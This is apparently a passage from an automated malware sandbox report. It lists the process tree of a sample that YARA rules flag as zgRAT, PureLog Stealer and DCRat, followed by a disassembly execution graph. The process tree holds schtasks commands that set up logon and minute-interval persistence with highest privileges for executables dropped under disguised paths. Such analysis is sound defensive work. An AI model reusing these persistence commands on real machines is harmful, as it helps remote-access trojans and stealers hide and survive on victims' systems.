                                                                                                                  Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:20
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:21
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 14 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:22
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "Agentcomponentbrokermonitordhcp" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:23
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "AgentcomponentbrokermonitordhcpA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe'" /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:24
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IwAYZ2SgOs.bat"
                                                                                                                  Imagebase:0x7ff71b740000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:25
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:26
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Imagebase:0x6c0000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:27
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Imagebase:0xb70000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:28
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff721f20000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:29
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                                  Imagebase:0x3e0000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:30
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                  Imagebase:0x7ff6d6c80000
                                                                                                                  File size:108'032 bytes
                                                                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:31
                                                                                                                  Start time:09:02:03
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files (x86)\java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                                  Imagebase:0x690000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:34
                                                                                                                  Start time:09:02:08
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe"
                                                                                                                  Imagebase:0x70000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:9.3%
                                                                                                                    Total number of Nodes:1507
                                                                                                                    Total number of Limit Nodes:46
                                                                                                                    execution_graph 23394 59cd58 23395 59ce22 23394->23395 23401 59cd7b _wcschr 23394->23401 23405 59c793 _wcslen _wcsrchr 23395->23405 23422 59d78f 23395->23422 23398 59d40a 23399 591fbb CompareStringW 23399->23401 23401->23395 23401->23399 23402 59ca67 SetWindowTextW 23402->23405 23405->23398 23405->23402 23408 59c855 SetFileAttributesW 23405->23408 23413 59cc31 GetDlgItem SetWindowTextW SendMessageW 23405->23413 23416 59cc71 SendMessageW 23405->23416 23421 591fbb CompareStringW 23405->23421 23444 59b314 23405->23444 23448 59a64d GetCurrentDirectoryW 23405->23448 23453 58a5d1 6 API calls 23405->23453 23454 58a55a FindClose 23405->23454 23455 59b48e 76 API calls 2 library calls 23405->23455 23456 5a3e3e 23405->23456 23410 59c90f GetFileAttributesW 23408->23410 23420 59c86f _abort _wcslen 23408->23420 23410->23405 23412 59c921 DeleteFileW 23410->23412 23412->23405 23414 59c932 23412->23414 23413->23405 23450 584092 23414->23450 23416->23405 23418 59c967 MoveFileW 23418->23405 23419 59c97f MoveFileExW 23418->23419 23419->23405 23420->23405 23420->23410 23449 58b991 51 API calls 3 library calls 23420->23449 23421->23405 23424 59d799 _abort _wcslen 23422->23424 23423 59d9e7 23423->23405 23424->23423 23425 59d9c0 23424->23425 23426 59d8a5 23424->23426 23472 591fbb CompareStringW 23424->23472 23425->23423 23430 59d9de ShowWindow 23425->23430 23469 58a231 23426->23469 23430->23423 23432 59d925 23474 59dc3b 6 API calls 23432->23474 23433 59d97b CloseHandle 23435 59d989 23433->23435 23439 59d994 23433->23439 23434 59d8d1 23434->23423 23434->23432 23434->23433 23436 59d91b ShowWindow 23434->23436 23475 591fbb CompareStringW 23435->23475 23436->23432 23439->23425 23440 59d93d 23440->23433 23441 59d950 GetExitCodeProcess 23440->23441 23441->23433 23442 59d963 23441->23442 23442->23433 23445 59b31e 23444->23445 23446 59b3f0 ExpandEnvironmentStringsW 23445->23446 23447 59b40d 23445->23447 23446->23447 23447->23405 23448->23405 23449->23420 23490 584065 23450->23490 23453->23405 23454->23405 23455->23405 23457 5a8e54 23456->23457 23458 5a8e6c 23457->23458 23459 5a8e61 23457->23459 23461 5a8e74 23458->23461 23467 5a8e7d _unexpected 23458->23467 23577 5a8e06 23459->23577 23462 5a8dcc _free 20 API calls 23461->23462 23466 5a8e69 23462->23466 23463 5a8e82 23584 5a91a8 20 API calls __dosmaperr 23463->23584 23464 5a8ea7 HeapReAlloc 23464->23466 23464->23467 23466->23405 23467->23463 23467->23464 23585 5a7a5e 7 API calls 2 library calls 23467->23585 23476 58a243 23469->23476 23472->23426 23473 58b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23473->23434 23474->23440 23475->23439 23484 59ec50 23476->23484 23479 58a23a 23479->23434 23479->23473 23480 58a261 23486 58bb03 23480->23486 23482 58a275 23482->23479 23483 58a279 GetFileAttributesW 23482->23483 23483->23479 23485 58a250 GetFileAttributesW 23484->23485 23485->23479 23485->23480 23487 58bb10 _wcslen 23486->23487 23488 58bbb8 GetCurrentDirectoryW 23487->23488 23489 58bb39 _wcslen 23487->23489 23488->23489 23489->23482 23491 58407c __vsnwprintf_l 23490->23491 23494 5a5fd4 23491->23494 23497 5a4097 23494->23497 23498 5a40bf 23497->23498 23499 5a40d7 23497->23499 23514 5a91a8 20 API calls __dosmaperr 23498->23514 23499->23498 23501 5a40df 23499->23501 23516 5a4636 23501->23516 23502 5a40c4 23515 5a9087 26 API calls ___std_exception_copy 23502->23515 23506 5a40cf 23527 59fbbc 23506->23527 23509 584086 GetFileAttributesW 23509->23414 23509->23418 23510 5a4167 23525 5a49e6 51 API calls 4 library calls 23510->23525 23513 5a4172 23526 5a46b9 20 API calls _free 23513->23526 23514->23502 23515->23506 23517 5a40ef 23516->23517 23518 5a4653 23516->23518 23524 5a4601 20 API calls 2 library calls 23517->23524 23518->23517 23534 5a97e5 GetLastError 23518->23534 23520 5a4674 23554 5a993a 38 API calls __fassign 23520->23554 23522 5a468d 23555 5a9967 38 API calls __fassign 23522->23555 23524->23510 23525->23513 23526->23506 23528 59fbc5 IsProcessorFeaturePresent 23527->23528 23529 59fbc4 23527->23529 23531 59fc07 23528->23531 23529->23509 23576 59fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23531->23576 23533 59fcea 23533->23509 23535 5a97fb 23534->23535 23536 5a9801 23534->23536 23556 5aae5b 11 API calls 2 library calls 23535->23556 23541 5a9850 SetLastError 23536->23541 23557 5ab136 23536->23557 23540 5a981b 23564 5a8dcc 23540->23564 23541->23520 23544 5a9830 23544->23540 23546 5a9837 23544->23546 23545 5a9821 23547 5a985c SetLastError 23545->23547 23571 5a9649 20 API calls _unexpected 23546->23571 23572 5a8d24 38 API calls _abort 23547->23572 23549 5a9842 23552 5a8dcc _free 20 API calls 23549->23552 23553 5a9849 23552->23553 23553->23541 23553->23547 23554->23522 23555->23517 23556->23536 23562 5ab143 _unexpected 23557->23562 23558 5ab183 23574 5a91a8 20 API calls __dosmaperr 23558->23574 23559 5ab16e RtlAllocateHeap 23560 5a9813 23559->23560 23559->23562 23560->23540 23570 5aaeb1 11 API calls 2 library calls 23560->23570 23562->23558 23562->23559 23573 5a7a5e 7 API calls 2 library calls 23562->23573 23565 5a8dd7 RtlFreeHeap 23564->23565 23566 5a8e00 _free 23564->23566 23565->23566 23567 5a8dec 23565->23567 23566->23545 23575 5a91a8 20 API calls __dosmaperr 23567->23575 23569 5a8df2 GetLastError 23569->23566 23570->23544 23571->23549 23573->23562 23574->23560 23575->23569 23576->23533 23578 5a8e44 23577->23578 23582 5a8e14 _unexpected 23577->23582 23587 5a91a8 20 API calls __dosmaperr 23578->23587 23580 5a8e2f RtlAllocateHeap 23581 5a8e42 23580->23581 23580->23582 23581->23466 23582->23578 23582->23580 23586 5a7a5e 7 API calls 2 library calls 23582->23586 23584->23466 23585->23467 23586->23582 23587->23581 25332 59e455 14 API calls ___delayLoadHelper2@8 23680 59e44b 23681 59e3f4 23680->23681 23682 59e85d ___delayLoadHelper2@8 14 API calls 23681->23682 23682->23681 25333 59a440 GdipCloneImage GdipAlloc 25395 5a3a40 5 API calls _ValidateLocalCookies 25410 5b1f40 CloseHandle 23729 589f7a 23730 589f88 23729->23730 23731 589f8f 23729->23731 23732 589f9c GetStdHandle 23731->23732 23739 589fab 23731->23739 23732->23739 23733 58a003 WriteFile 23733->23739 23734 589fcf 23735 589fd4 WriteFile 23734->23735 23734->23739 23735->23734 23735->23739 23737 58a095 23741 586e98 77 API calls 23737->23741 23739->23730 23739->23733 23739->23734 23739->23735 23739->23737 23740 586baa 78 API calls 23739->23740 23740->23739 23741->23730 25336 59a070 10 API calls 25396 59b270 99 API calls 25412 581f72 128 API calls __EH_prolog 23789 589a74 23793 589a7e 23789->23793 23790 589ab1 23791 589b9d SetFilePointer 23791->23790 23792 589bb6 GetLastError 23791->23792 23792->23790 23793->23790 23793->23791 23794 589b79 23793->23794 23796 58981a 23793->23796 23794->23791 23797 589833 23796->23797 23800 589e80 23797->23800 23801 589e92 23800->23801 23806 589ea5 23800->23806 23803 589865 23801->23803 23809 586d5b 77 API calls 23801->23809 23802 589eb8 SetFilePointer 23802->23803 23805 589ed4 GetLastError 23802->23805 23803->23794 23805->23803 23807 589ede 23805->23807 23806->23802 23806->23803 23807->23803 23810 586d5b 77 API calls 23807->23810 23809->23806 23810->23803 25338 581075 84 API calls 25397 5a8268 55 API calls _free 25339 59c793 107 API calls 5 library calls 25413 5a7f6e 52 API calls 2 library calls 25415 581710 86 API calls 25372 59ad10 73 API calls 25342 59a400 GdipDisposeImage GdipFree 25398 59d600 70 API calls 25343 5a6000 QueryPerformanceFrequency QueryPerformanceCounter 25375 5a2900 6 API calls 4 library calls 25399 5af200 51 API calls 25416 5aa700 21 API calls 25378 59f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25418 59ff30 LocalFree 24710 5abb30 24711 5abb39 24710->24711 24713 5abb42 24710->24713 24714 5aba27 24711->24714 24715 5a97e5 _unexpected 38 API calls 24714->24715 24716 5aba34 24715->24716 24734 5abb4e 24716->24734 24718 5aba3c 24743 5ab7bb 24718->24743 24721 5aba53 24721->24713 24722 5a8e06 __vsnwprintf_l 21 API calls 24723 5aba64 24722->24723 24724 5aba96 24723->24724 24750 5abbf0 24723->24750 24726 5a8dcc _free 20 API calls 24724->24726 24726->24721 24728 5aba91 24760 5a91a8 20 API calls __dosmaperr 24728->24760 24730 5abada 24730->24724 24761 5ab691 26 API calls 24730->24761 24731 5abaae 24731->24730 24732 5a8dcc _free 20 API calls 24731->24732 24732->24730 24735 5abb5a ___scrt_is_nonwritable_in_current_image 24734->24735 24736 5a97e5 _unexpected 38 API calls 24735->24736 24737 5abb64 24736->24737 24741 5abbe8 _abort 24737->24741 24742 5a8dcc _free 20 API calls 24737->24742 24762 5a8d24 38 API calls _abort 24737->24762 24763 5aac31 EnterCriticalSection 24737->24763 24764 5abbdf LeaveCriticalSection _abort 24737->24764 24741->24718 24742->24737 24744 5a4636 __fassign 38 API calls 24743->24744 24745 5ab7cd 24744->24745 24746 5ab7ee 24745->24746 24747 5ab7dc GetOEMCP 24745->24747 24748 5ab805 24746->24748 24749 5ab7f3 GetACP 24746->24749 24747->24748 24748->24721 24748->24722 24749->24748 24751 5ab7bb 40 API calls 24750->24751 24752 5abc0f 24751->24752 24754 5abc60 IsValidCodePage 24752->24754 24757 5abc16 24752->24757 24759 5abc85 _abort 24752->24759 24753 59fbbc _ValidateLocalCookies 5 API calls 24755 5aba89 24753->24755 24756 5abc72 GetCPInfo 24754->24756 24754->24757 24755->24728 24755->24731 24756->24757 24756->24759 24757->24753 24765 5ab893 GetCPInfo 24759->24765 24760->24724 24761->24724 24763->24737 24764->24737 24770 5ab8cd 24765->24770 24774 5ab977 24765->24774 24767 59fbbc _ValidateLocalCookies 5 API calls 24769 5aba23 24767->24769 24769->24757 24775 5ac988 24770->24775 24773 5aab78 __vsnwprintf_l 43 API calls 24773->24774 24774->24767 24776 5a4636 __fassign 38 API calls 24775->24776 24777 5ac9a8 MultiByteToWideChar 24776->24777 24779 5aca7e 24777->24779 24780 5ac9e6 24777->24780 24781 59fbbc _ValidateLocalCookies 5 API calls 24779->24781 24783 5a8e06 __vsnwprintf_l 21 API calls 24780->24783 24786 5aca07 _abort __vsnwprintf_l 24780->24786 24784 5ab92e 24781->24784 24782 5aca78 24794 5aabc3 20 API calls _free 24782->24794 24783->24786 24789 5aab78 24784->24789 24786->24782 24787 5aca4c MultiByteToWideChar 24786->24787 24787->24782 24788 5aca68 GetStringTypeW 24787->24788 24788->24782 24790 5a4636 __fassign 38 API calls 24789->24790 24791 5aab8b 24790->24791 24795 5aa95b 24791->24795 24794->24779 24796 5aa976 __vsnwprintf_l 24795->24796 24797 5aa99c MultiByteToWideChar 24796->24797 24798 5aab50 24797->24798 24799 5aa9c6 24797->24799 24800 59fbbc _ValidateLocalCookies 5 API calls 24798->24800 24802 5a8e06 __vsnwprintf_l 21 API calls 24799->24802 24805 5aa9e7 __vsnwprintf_l 24799->24805 24801 5aab63 24800->24801 24801->24773 24802->24805 24803 5aaa9c 24831 5aabc3 20 API calls _free 24803->24831 24804 5aaa30 MultiByteToWideChar 24804->24803 24806 5aaa49 24804->24806 24805->24803 24805->24804 24822 5aaf6c 24806->24822 24810 5aaaab 24814 5a8e06 __vsnwprintf_l 21 API calls 24810->24814 24817 5aaacc __vsnwprintf_l 24810->24817 24811 5aaa73 24811->24803 24813 5aaf6c __vsnwprintf_l 11 API calls 24811->24813 24812 5aab41 24830 5aabc3 20 API calls _free 24812->24830 24813->24803 24814->24817 24815 5aaf6c __vsnwprintf_l 11 API calls 24818 5aab20 24815->24818 24817->24812 24817->24815 24818->24812 24819 5aab2f WideCharToMultiByte 24818->24819 24819->24812 24820 5aab6f 24819->24820 24832 5aabc3 20 API calls _free 24820->24832 24823 5aac98 _unexpected 5 API calls 24822->24823 24824 5aaf93 24823->24824 24827 5aaf9c 24824->24827 24833 5aaff4 10 API calls 3 library calls 24824->24833 24826 5aafdc LCMapStringW 24826->24827 24828 59fbbc _ValidateLocalCookies 5 API calls 24827->24828 24829 5aaa60 24828->24829 24829->24803 24829->24810 24829->24811 24830->24803 24831->24798 24832->24803 24833->24826 25346 5ac030 GetProcessHeap 25379 5ab4ae 27 API calls _ValidateLocalCookies 25400 59c220 93 API calls _swprintf 25349 5af421 21 API calls __vsnwprintf_l 25350 581025 29 API calls 25401 5a0ada 51 API calls 2 library calls 23590 59e1d1 14 API calls ___delayLoadHelper2@8 25351 59f4d3 20 API calls 25420 5aa3d0 21 API calls 2 library calls 25421 5b2bd0 VariantClear 23593 5810d5 23598 585abd 23593->23598 23599 585ac7 __EH_prolog 23598->23599 23605 58b505 23599->23605 23601 585ad3 23611 585cac GetCurrentProcess GetProcessAffinityMask 23601->23611 23606 58b50f __EH_prolog 23605->23606 23612 58f1d0 82 API calls 23606->23612 23608 58b521 23613 58b61e 23608->23613 23612->23608 23614 58b630 _abort 23613->23614 23617 5910dc 23614->23617 23620 59109e GetCurrentProcess GetProcessAffinityMask 23617->23620 23621 58b597 23620->23621 23621->23601 23622 59e2d7 23623 59e1db 23622->23623 23625 59e85d 23623->23625 23651 59e5bb 23625->23651 23627 59e86d 23628 59e8ca 23627->23628 23629 59e8ee 23627->23629 23630 59e7fb DloadReleaseSectionWriteAccess 6 API calls 23628->23630 23632 59e966 LoadLibraryExA 23629->23632 23634 59e9c7 23629->23634 23641 59e9d9 23629->23641 23645 59ea95 23629->23645 23631 59e8d5 RaiseException 23630->23631 23646 59eac3 23631->23646 23633 59e979 GetLastError 23632->23633 23632->23634 23636 59e98c 23633->23636 23637 59e9a2 23633->23637 23635 59e9d2 FreeLibrary 23634->23635 23634->23641 23635->23641 23636->23634 23636->23637 23639 59e7fb DloadReleaseSectionWriteAccess 6 API calls 23637->23639 23638 59ea37 GetProcAddress 23640 59ea47 GetLastError 23638->23640 23638->23645 23642 59e9ad RaiseException 23639->23642 23643 59ea5a 23640->23643 23641->23638 23641->23645 23642->23646 23643->23645 23647 59e7fb DloadReleaseSectionWriteAccess 6 API calls 23643->23647 23660 59e7fb 23645->23660 23646->23623 23648 59ea7b RaiseException 23647->23648 23649 59e5bb ___delayLoadHelper2@8 6 API calls 23648->23649 23650 59ea92 23649->23650 23650->23645 23652 59e5ed 23651->23652 23653 59e5c7 23651->23653 23652->23627 23668 59e664 23653->23668 23655 59e5cc 23657 59e5e8 23655->23657 23671 59e78d 23655->23671 23676 59e5ee GetModuleHandleW GetProcAddress GetProcAddress 23657->23676 23659 59e836 23659->23627 23661 59e80d 23660->23661 23662 59e82f 23660->23662 23663 59e664 DloadReleaseSectionWriteAccess 3 API calls 23661->23663 23662->23646 23664 59e812 23663->23664 23665 59e82a 23664->23665 23666 59e78d DloadProtectSection 3 API calls 23664->23666 23679 59e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23665->23679 23666->23665 23677 59e5ee GetModuleHandleW GetProcAddress GetProcAddress 23668->23677 23670 59e669 23670->23655 23674 59e7a2 DloadProtectSection 23671->23674 23672 59e7a8 23672->23657 23673 59e7dd VirtualProtect 23673->23672 23674->23672 23674->23673 23678 59e6a3 VirtualQuery GetSystemInfo 23674->23678 23676->23659 23677->23670 23678->23673 23679->23662 25403 5962ca 123 API calls __InternalCxxFrameHandler 25381 59b5c0 100 API calls 25423 5977c0 118 API calls 25424 59ffc0 RaiseException _com_error::_com_error CallUnexpected 23686 59dec2 23687 59decf 23686->23687 23694 58e617 23687->23694 23690 584092 _swprintf 51 API calls 23691 59def1 SetDlgItemTextW 23690->23691 23698 59b568 PeekMessageW 23691->23698 23695 58e627 23694->23695 23703 58e648 23695->23703 23699 59b5bc 23698->23699 23700 59b583 GetMessageW 23698->23700 23701 59b599 IsDialogMessageW 23700->23701 23702 59b5a8 TranslateMessage DispatchMessageW 23700->23702 23701->23699 23701->23702 23702->23699 23709 58d9b0 23703->23709 23706 58e66b LoadStringW 23707 58e645 23706->23707 23708 58e682 LoadStringW 23706->23708 23707->23690 23708->23707 23714 58d8ec 23709->23714 23711 58d9cd 23712 58d9e2 23711->23712 23722 58d9f0 26 API calls 23711->23722 23712->23706 23712->23707 23715 58d904 23714->23715 23721 58d984 _strncpy 23714->23721 23717 58d928 23715->23717 23723 591da7 WideCharToMultiByte 23715->23723 23720 58d959 23717->23720 23724 58e5b1 50 API calls __vsnprintf 23717->23724 23725 5a6159 26 API calls 3 library calls 23720->23725 23721->23711 23722->23712 23723->23717 23724->23720 23725->23721 25353 5a2cfb 38 API calls 4 library calls 25382 5895f0 80 API calls 25383 59fd4f 9 API calls 2 library calls 25405 585ef0 82 API calls 23743 5a98f0 23751 5aadaf 23743->23751 23746 5a9904 23748 5a990c 23749 5a9919 23748->23749 23759 5a9920 11 API calls 23748->23759 23760 5aac98 23751->23760 23754 5aadee TlsAlloc 23755 5aaddf 23754->23755 23756 59fbbc _ValidateLocalCookies 5 API calls 23755->23756 23757 5a98fa 23756->23757 23757->23746 23758 5a9869 20 API calls 2 library calls 23757->23758 23758->23748 23759->23746 23761 5aacc8 23760->23761 23762 5aacc4 23760->23762 23761->23754 23761->23755 23762->23761 23765 5aace8 23762->23765 23767 5aad34 23762->23767 23764 5aacf4 GetProcAddress 23766 5aad04 _unexpected 23764->23766 23765->23761 23765->23764 23766->23761 23768 5aad55 LoadLibraryExW 23767->23768 23771 5aad4a 23767->23771 23769 5aad8a 23768->23769 23770 5aad72 GetLastError 23768->23770 23769->23771 23772 5aada1 FreeLibrary 23769->23772 23770->23769 23773 5aad7d LoadLibraryExW 23770->23773 23771->23762 23772->23771 23773->23769 23775 5aabf0 23776 5aabfb 23775->23776 23778 5aac24 23776->23778 23779 5aac20 23776->23779 23781 5aaf0a 23776->23781 23788 5aac50 DeleteCriticalSection 23778->23788 23782 5aac98 _unexpected 5 API calls 23781->23782 23783 5aaf31 23782->23783 23784 5aaf3a 23783->23784 23785 5aaf4f InitializeCriticalSectionAndSpinCount 23783->23785 23786 59fbbc _ValidateLocalCookies 5 API calls 23784->23786 23785->23784 